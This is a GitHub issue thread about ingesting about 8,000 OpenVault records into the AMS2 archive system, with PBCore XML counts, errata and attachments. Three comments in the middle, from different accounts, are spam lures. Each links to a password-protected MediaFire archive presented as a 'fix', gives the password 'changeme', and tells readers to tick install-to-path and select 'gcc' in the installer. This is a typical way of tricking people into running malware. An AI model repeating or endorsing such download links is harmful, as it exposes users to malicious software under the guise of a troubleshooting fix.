### ISSUE TITLE
Ingest OV GUIDS

### ISSUE THREAD

**Issue by ekemeyer** [WGBH-MLA/ams#908]
Currently there are 8,088 records in OV that are not in AMS2 (see txt attached). 

These records are in AMS1, however there have been updates made to them in OV using the filemaker database. These FM records will need to be the authoritative records used in AMS2, so we need pbcore xml for each of them, which can then be ingested into AMS2

[gbh_ovPriority.txt](https://github.com/user-attachments/files/16752055/gbh_ovPriority.txt)

## Done Looks Like
AMS2 has all of the OV records it is currently missing

## Tasklist

- [x] Identify OV GUIDS missing from AMS2
- [x] Retrieve pbcore .xml files for each of those guids
- [x] Import pbcore into AMS2

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by foo4thought** [comment]
5,805 OpenVault items were found utilizing the structure `<pbcoreIdentifier source="AAPB_UID">`.  
[ingest_ov_guids_longlist.zip](https://github.com/user-attachments/files/16761348/ingest_ov_guids_longlist.zip)


Errata:  two items listed the same AAPB_UID - cpb-aacip-15-2f7jq0tw23 - resulting in only 5,804 XML files in attachment ingest_ov_guids_longlist.zip.  (i.e., the initial XML entry in the ZIP archive got overwritten.)

Only 1,028 OpenVault items could be selected using the 8,087 AAPB GUIDs provided in document 'gbh_ovPriority.txt' .  Reference attachment 'ingest_ov_guids_shortlist.zip'
[ingest_ov_guids_shortlist.zip](https://github.com/user-attachments/files/16761194/ingest_ov_guids_shortlist.zip)

Perhaps "missing" matches are owed to omission of that metadata in the OpenVault_pbcore records; is it possible that some GUIDs were provided in error?   

Attachment 'aapb_openvault.tsv.gz' is provided to map UIDs of OpenVault and AAPB.
[aapb_openvault.tsv.gz](https://github.com/user-attachments/files/16761399/aapb_openvault.tsv.gz)

**Comment by foo4thought** [comment]
I will identify the two OV items that listed cpb-aacip-15-2f7jq0tw23 and clarify correctness with Peter Higgins

**Comment by ekemeyer** [comment]
After talking with Peter - we want to work with AMS1 data. I went ahead with ingesting 8,058 records from AMS1 to AMS2. 30 did not pass due to character length errors (long descriptions). Attaching those records here. @phigg  create a new ticket when these are fixed and ready to go!

[OV_error.zip](https://github.com/user-attachments/files/16788465/OV_error.zip)
